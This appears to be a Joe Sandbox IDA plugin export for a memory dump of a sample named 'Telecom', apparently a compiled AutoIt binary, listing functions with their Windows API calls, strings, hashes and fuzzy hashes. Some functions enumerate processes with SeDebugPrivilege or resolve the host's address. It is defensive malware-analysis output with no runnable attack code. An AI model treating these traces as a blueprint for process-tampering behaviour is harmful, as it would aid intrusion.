Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Process$CloseErrorLastOpen$ChangeCreateFindFirstHandleNotificationProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 1701285019-2896544425
Opcode ID: 211e9bd70636984ffc3375d9fa5bc22bb577c7516a3160c524915679a14df9ff
Instruction ID: 722fb5f3075ae28b5119da0978d705171add6f057047039db7e83ca474f0b5bb
Opcode Fuzzy Hash: 211e9bd70636984ffc3375d9fa5bc22bb577c7516a3160c524915679a14df9ff
Instruction Fuzzy Hash: C861C1782042459FE350DF15C484F2ABBE1AF5430CF14849EE4668BBA3C779EC55CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 004D4322 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004D43C1
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004D43D6
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004D43F0
_wcslen.LIBCMT ref: 004D4435
SendMessageW.USER32(?,00001057,00000000,?), ref: 004D4462
SendMessageW.USER32(?,00001061,?,0000000F), ref: 004D4490

Strings

SysListView32, xrefs: 004D4393

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: 7129a81e83db62e329e32d0862de26387ee7648c7cecb6db5015e29d6e57f40c
Instruction ID: b87bbb350cf22508c66960aa21f8e18b7ccedf0ea367d5d249f7e9ca10c1fc55
Opcode Fuzzy Hash: 7129a81e83db62e329e32d0862de26387ee7648c7cecb6db5015e29d6e57f40c
Instruction Fuzzy Hash: 6D41AF71A00319ABDB219F64CC49BEB7BA9FB48350F10012BF944E7391D7789990DB98

Uniqueness

Uniqueness Score: -1.00%

Function 004AC625 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004AC6C4
IsMenu.USER32(00000000), ref: 004AC6E4
CreatePopupMenu.USER32 ref: 004AC71A
GetMenuItemCount.USER32(01495B28), ref: 004AC76B
InsertMenuItemW.USER32(01495B28,?,00000001,00000030), ref: 004AC793

Strings

2, xrefs: 004AC6FE
0, xrefs: 004AC66F

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: 6435ca575228c6bc3e5f26dbb02e52883e5fb127598e352c18a44ed306e58c59
Instruction ID: de4860404353ae721a46effe4227296856364302082177f3c4b9fde3861e59ba
Opcode Fuzzy Hash: 6435ca575228c6bc3e5f26dbb02e52883e5fb127598e352c18a44ed306e58c59
Instruction Fuzzy Hash: 5D51C274A00206EBDF50CF68D9C4BAEBBF4AF6A314F24412BE41297390D7789941CF59

Uniqueness

Uniqueness Score: -1.00%

Function 004D86FC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 004D8740
SetWindowLongW.USER32(00000000,000000F0,?), ref: 004D8765
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 004D877D
GetSystemMetrics.USER32(00000004), ref: 004D87A6
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,004BC1F2,00000000), ref: 004D87C6

Part of subcall function 0044249F: GetWindowLongW.USER32(00000000,000000EB), ref: 004424B0

GetSystemMetrics.USER32(00000004), ref: 004D87B1

Strings

(Q, xrefs: 004D8709

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID: (Q
API String ID: 2294984445-2768264020
Opcode ID: b775cfa711ef53243b3c99b62d5b8b9c5f7ecefddcfebc6bbc878658d8f239d8
Instruction ID: 383770a9b80c7336fbc2722063db0219c934f743b59db9f98e63666c5ae6178c
Opcode Fuzzy Hash: b775cfa711ef53243b3c99b62d5b8b9c5f7ecefddcfebc6bbc878658d8f239d8
Instruction Fuzzy Hash: 64218C71A11251EFCB149F38CC18A7B3BA5EB84325F25462FF926C23E0EA349850DB18

Uniqueness

Uniqueness Score: -1.00%

Function 004AD11F Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 004AD1BE

Strings

warning, xrefs: 004AD1A7
blank, xrefs: 004AD140
stop, xrefs: 004AD18F
info, xrefs: 004AD15F
question, xrefs: 004AD177

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: eec309531eb26ace0dc2d1173e2c29cd22087414684bb56096b078517b15854a
Instruction ID: 3615672a385fe8892a865c54b209fded27e2869e43878104bf9893db5a1b4cf6
Opcode Fuzzy Hash: eec309531eb26ace0dc2d1173e2c29cd22087414684bb56096b078517b15854a
Instruction Fuzzy Hash: 9311DD35E4C30ABAE7055B55DC82DAF7B9CDF2A764B10002BF502A66C1EBBC6A41416E

Uniqueness

Uniqueness Score: -1.00%

Function 004AE73E Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 004AE759
gethostname.WSOCK32(?,00000100), ref: 004AE773
gethostbyname.WSOCK32(?), ref: 004AE780
inet_ntoa.WSOCK32(?), ref: 004AE7C2
_strcat.LIBCMT ref: 004AE7D0
WSACleanup.WSOCK32 ref: 004AE7F5

Strings

0.0.0.0, xrefs: 004AE79E

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 642191829-3771769585
Opcode ID: 1152e0f494c9d28196ecfd31023038d66aa35dfb8da76f712bda274e6258ef58
Instruction ID: cb2c304e4aa1932df1636d7340fff6df5206b2d4ee6dc366620357245cf1f553
Opcode Fuzzy Hash: 1152e0f494c9d28196ecfd31023038d66aa35dfb8da76f712bda274e6258ef58
Instruction Fuzzy Hash: E6112431900114BBCB20BB32DC4AEDE37ACEF52714F0000BBF511A2191FE788A81D669

Uniqueness

Uniqueness Score: -1.00%

Function 004C4F80 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 004C50A5
VariantInit.OLEAUT32(?), ref: 004C51A6
VariantClear.OLEAUT32(?), ref: 004C51B0
VariantClear.OLEAUT32(?), ref: 004C520D

Strings

Incorrect Object type in FOR..IN loop, xrefs: 004C5189
Null Object assignment in FOR..IN loop, xrefs: 004C5035, 004C5163, 004C521B

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: 295cede90ee7ff6da8588f17b5706d456f890bef4dd7c38d57c31b91a93f7bf9
Instruction ID: 7d313918de9c29d6d96ca2b079d06204bfe22f9de85dec4bd26bbdd9e94b3006
Opcode Fuzzy Hash: 295cede90ee7ff6da8588f17b5706d456f890bef4dd7c38d57c31b91a93f7bf9
Instruction Fuzzy Hash: F5919D74E00615ABDF608FA5CC48FAFBBB8EF45314F14855EE505AB280DB74A981CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 004C43A4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 004C43C8
CharUpperBuffW.USER32(?,?), ref: 004C44D7
_wcslen.LIBCMT ref: 004C44E7
VariantClear.OLEAUT32(?), ref: 004C467C

Part of subcall function 004B169E: VariantInit.OLEAUT32(00000000), ref: 004B16DE
Part of subcall function 004B169E: VariantCopy.OLEAUT32(?,?), ref: 004B16E7
Part of subcall function 004B169E: VariantClear.OLEAUT32(?), ref: 004B16F3

Strings

AUTOIT.ERROR, xrefs: 004C44DD, 004C44E2
Incorrect Parameter format, xrefs: 004C4403, 004C45FE

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: 8c22706b22dffbd0541eab5fcc631a85cb2548026f4e0f8443ff60871bcb5693
Instruction ID: 8d4a4337639d9a3f20a9eac77bb851daebb8f92080d3a75cf7ca63ef80fcf10f
Opcode Fuzzy Hash: 8c22706b22dffbd0541eab5fcc631a85cb2548026f4e0f8443ff60871bcb5693
Instruction Fuzzy Hash: 63916A74A043019FC744DF25C590A6AB7E4FF89718F14892EF88987351DB39ED06CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 004C560A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 004A08FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,004A0831,80070057,?,?,?,004A0C4E), ref: 004A091B
Part of subcall function 004A08FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004A0831,80070057,?,?), ref: 004A0936
Part of subcall function 004A08FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004A0831,80070057,?,?), ref: 004A0944
Part of subcall function 004A08FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004A0831,80070057,?), ref: 004A0954

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 004C56AE
_wcslen.LIBCMT ref: 004C57B6
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 004C582C
CoTaskMemFree.OLE32(?), ref: 004C5837

Strings

NULL Pointer assignment, xrefs: 004C5880, 004C58AF

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: 342c5629f3710f7fa5d1bf5bd943fb9af48f41f7f6a9aa6496a9c443b5151082
Instruction ID: d805c208ffbf8531128faa686fd59437d8eaf0fea001a26e1525bdbe6ff068a6
Opcode Fuzzy Hash: 342c5629f3710f7fa5d1bf5bd943fb9af48f41f7f6a9aa6496a9c443b5151082
Instruction Fuzzy Hash: 88910775D00219AFDF10DFA5D880EEEB7B8BF08304F10456EE915A7251DB78AA44CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 004D2B99 Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 004D2C1F
GetMenuItemCount.USER32(00000000), ref: 004D2C51
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 004D2C79
_wcslen.LIBCMT ref: 004D2CAF
GetMenuItemID.USER32(?,?), ref: 004D2CE9
GetSubMenu.USER32(?,?), ref: 004D2CF7

Part of subcall function 004A4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 004A43AD
Part of subcall function 004A4393: GetCurrentThreadId.KERNEL32 ref: 004A43B4
Part of subcall function 004A4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,004A2F00), ref: 004A43BB

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 004D2D7F

Part of subcall function 004AF292: Sleep.KERNEL32 ref: 004AF30A

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: cf1450dbf141f27806b2e59cad936a43f22ce39c2c3374588b1d5c0fda05ac1a
Instruction ID: 93627d36cc1c81597c1430b888afc40d09c84f7a662a9266ae0b02eb5de78090
Opcode Fuzzy Hash: cf1450dbf141f27806b2e59cad936a43f22ce39c2c3374588b1d5c0fda05ac1a
Instruction Fuzzy Hash: F171AC75E00205AFCB00EF65C950AAEB7B1EF59314F10846BE816EB351DB78AE428B94

Uniqueness

Uniqueness Score: -1.00%

Function 00463090 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 004630BB
___except_validate_context_record.LIBVCRUNTIME ref: 004630C3
_ValidateLocalCookies.LIBCMT ref: 00463151
__IsNonwritableInCurrentImage.LIBCMT ref: 0046317C
_ValidateLocalCookies.LIBCMT ref: 004631D1

Strings

csm, xrefs: 00463166

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 7192929984598fb82648ee29b95ddd5c6298ec09fc6f8108055f2c38cc0ccd19
Instruction ID: d1bf91b0cd689cd54c4c5e07c41632aea9d2fe9b560d4dce0111471780e86c2d
Opcode Fuzzy Hash: 7192929984598fb82648ee29b95ddd5c6298ec09fc6f8108055f2c38cc0ccd19
Instruction Fuzzy Hash: D541D834E002889BCF10DF59C885ADE7BB5AF46329F14815BE8146B392E739DF05CB96

Uniqueness

Uniqueness Score: -1.00%

Function 004B42B9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 004B4310
TranslateAcceleratorW.USER32(?,00000000,?), ref: 004B4367
TranslateMessage.USER32(?), ref: 004B4390
DispatchMessageW.USER32(?), ref: 004B439A
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004B43AB

Strings

(Q, xrefs: 004B437D

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID: (Q
API String ID: 2256411358-2768264020
Opcode ID: fd1c53a5d91801a0295e02ed4a1bc4a3685ace9dfa79af4504a13ac24c5bece9
Instruction ID: ebed903efa4f57e44a755bbe5dcaa111839f87d1f21d6390192f8a65cb7d2856
Opcode Fuzzy Hash: fd1c53a5d91801a0295e02ed4a1bc4a3685ace9dfa79af4504a13ac24c5bece9
Instruction Fuzzy Hash: 7631CC70604345DEEB39CB74D848BF737E8AB50304F08556BD862C22A2E37C9599DB39

Uniqueness

Uniqueness Score: -1.00%

Function 004A808D Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004A80D0
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004A80F6
SysAllocString.OLEAUT32(00000000), ref: 004A80F9
SysAllocString.OLEAUT32(?), ref: 004A8117
SysFreeString.OLEAUT32(?), ref: 004A8120
StringFromGUID2.OLE32(?,?,00000028), ref: 004A8145
SysAllocString.OLEAUT32(?), ref: 004A8153

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 8c70ebbb3e91f0457a932a5e168317aa31380aed6f804692e451711f7e56e15a
Instruction ID: d3f51d218943d88a57e267d8f61db354d837ca6bed0378bade9ff08da41c2f6e
Opcode Fuzzy Hash: 8c70ebbb3e91f0457a932a5e168317aa31380aed6f804692e451711f7e56e15a
Instruction Fuzzy Hash: 8921A772601219AFDF10DFA8CC88CBB73ACEB1A364704842AF915DB290DA74DC468768

Uniqueness

Uniqueness Score: -1.00%

Function 004A8164 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004A81A9
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004A81CF
SysAllocString.OLEAUT32(00000000), ref: 004A81D2
SysAllocString.OLEAUT32 ref: 004A81F3
SysFreeString.OLEAUT32 ref: 004A81FC
StringFromGUID2.OLE32(?,?,00000028), ref: 004A8216
SysAllocString.OLEAUT32(?), ref: 004A8224

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 6579843174e0f22e11f272d476ca7f252c27389c5352c54e018a18950778a926
Instruction ID: 046279980337c5ee3b6d2df12a0c0611a9461b495ee80ffce0b2f1226261bd97
Opcode Fuzzy Hash: 6579843174e0f22e11f272d476ca7f252c27389c5352c54e018a18950778a926
Instruction Fuzzy Hash: BA217772601104BF9B109BA8DC89DBB77ECFB5A364704812AF905CB2A0EA74DC41CB68

Uniqueness

Uniqueness Score: -1.00%

Function 004B0E79 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 004B0E99
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 004B0ED5

Strings

nul, xrefs: 004B0F0E

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 9d461169661bcd4a1407b5af7e8ca89bbe5e4e1bb34179fd0be65f76e027e451
Instruction ID: 1ef4bfc540ec0076638899300e13e76a52b2d858f954b8820ea99934b6ae0c56
Opcode Fuzzy Hash: 9d461169661bcd4a1407b5af7e8ca89bbe5e4e1bb34179fd0be65f76e027e451
Instruction Fuzzy Hash: 0C215E70A00309ABDB208F69DC04AEF77A8BF55725F204A6AFCA5D72D0D7B4D851CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004B0F4E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 004B0F6D
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 004B0FA8

Strings

nul, xrefs: 004B0FE0

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 98a654913dc69e16c9e0bd64bdf1d9ec398c5edb2792fd3ffcb5aa82d95c9e4b
Instruction ID: 3c48c52f73370a1ee2b40fd4697091cb28c86685470250eecbc826f6395a4c86
Opcode Fuzzy Hash: 98a654913dc69e16c9e0bd64bdf1d9ec398c5edb2792fd3ffcb5aa82d95c9e4b
Instruction Fuzzy Hash: 97219571600345DBDB309F688C04ADB77E8BF55725F200A1AF8A1D32E0D7B898A1DB68

Uniqueness

Uniqueness Score: -1.00%

Function 004D4B4B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00447873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004478B1
Part of subcall function 00447873: GetStockObject.GDI32(00000011), ref: 004478C5
Part of subcall function 00447873: SendMessageW.USER32(00000000,00000030,00000000), ref: 004478CF

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 004D4BB0
